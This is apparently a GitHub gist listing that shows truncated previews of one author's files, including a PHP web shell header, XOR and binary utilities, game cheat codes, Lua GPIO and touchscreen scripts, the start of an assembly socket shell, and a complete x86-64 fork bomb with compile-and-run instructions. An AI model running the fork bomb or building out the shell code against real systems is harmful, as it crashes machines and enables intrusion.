This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /** | |
| * Shadow 5hell | |
| * | |
| * @category Seucurity | |
| * | |
| * @package Shadow | |
| * | |
| * @author Cvar1984 <[email protected]> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /** | |
| * BinaryUtils.php | |
| * Copyright (c) 2021 Cvar1984 <[email protected]> | |
| * | |
| * DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE | |
| * Version 2, December 2004 | |
| * | |
| * Everyone is permitted to copy and distribute verbatim or modified | |
| * copies of this license document, and changing it is allowed as long |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /** | |
| * XorEncrypt.php | |
| * Copyright (c) 2021 Cvar1984 <[email protected]> | |
| * | |
| * DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE | |
| * Version 2, December 2004 | |
| * | |
| * Everyone is permitted to copy and distribute verbatim or modified | |
| * copies of this license document, and changing it is allowed as long |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| _C0 Infinite HP | |
| _L 0x004078C2 0x000000FF | |
| _C0 Instant Kill | |
| _L 0x204081F0 0x00000000 | |
| _C0 Max Gold | |
| _L 0x213DFD6C 0x05F5E0FF | |
| _C0 P1 Play As Azazel | |
| _L 0x603FDAF0 0x00000044 | |
| _L 0x00020003 0x00000168 | |
| _L 0x200002D4 0x2000012C |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| section .bss | |
| input resb 256 | |
| section .rodata | |
| path_name db '/bin/bash', 0; terminate string | |
| struc socket_struct; define structure | |
| sin_family: resw 1 | |
| sin_port: resw 1 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| section .text | |
| global _start | |
| _start: | |
| mov rax, 57; sys_garpu :) | |
| syscall | |
| jmp _start | |
| ; compile: nasm -f elf64 magic.asm && ld magic.o -o magic && ./magic |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| --[[-- | |
| Copyright (c) 2020 Ramdhan Firmansyah | |
| File : electric.lua | |
| Author : Cvar1984 <[email protected]> | |
| Date : 16.12.2020 | |
| Last Modified Date: 16.12.2020 | |
| Last Modified By : Cvar1984 <[email protected]> | |
| --]]-- | |
| local Electric = {}; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| --[[-- | |
| Copyright (c) 2020 Ramdhan Firmansyah | |
| File : swipe.lua | |
| Author : Cvar1984 <[email protected]> | |
| Date : 28.10.2020 | |
| Last Modified Date: 28.10.2020 | |
| Last Modified By : Cvar1984 <[email protected]> | |
| --]]-- | |
| exec = os.execute; | |
| local touchscreen = {}; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| local cron = require 'cron' | |
| relay = {0, 1, 2, 3}; | |
| for x in pairs(relay) do | |
| gpio.mode(relay[x], gpio.OUTPUT); | |
| end | |
| pulser = gpio.pulse.build({ | |
| { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /** | |
| * Class: Info | |
| * | |
| */ | |
| class Info | |
| { | |
| /** | |
| * getPhpVersion |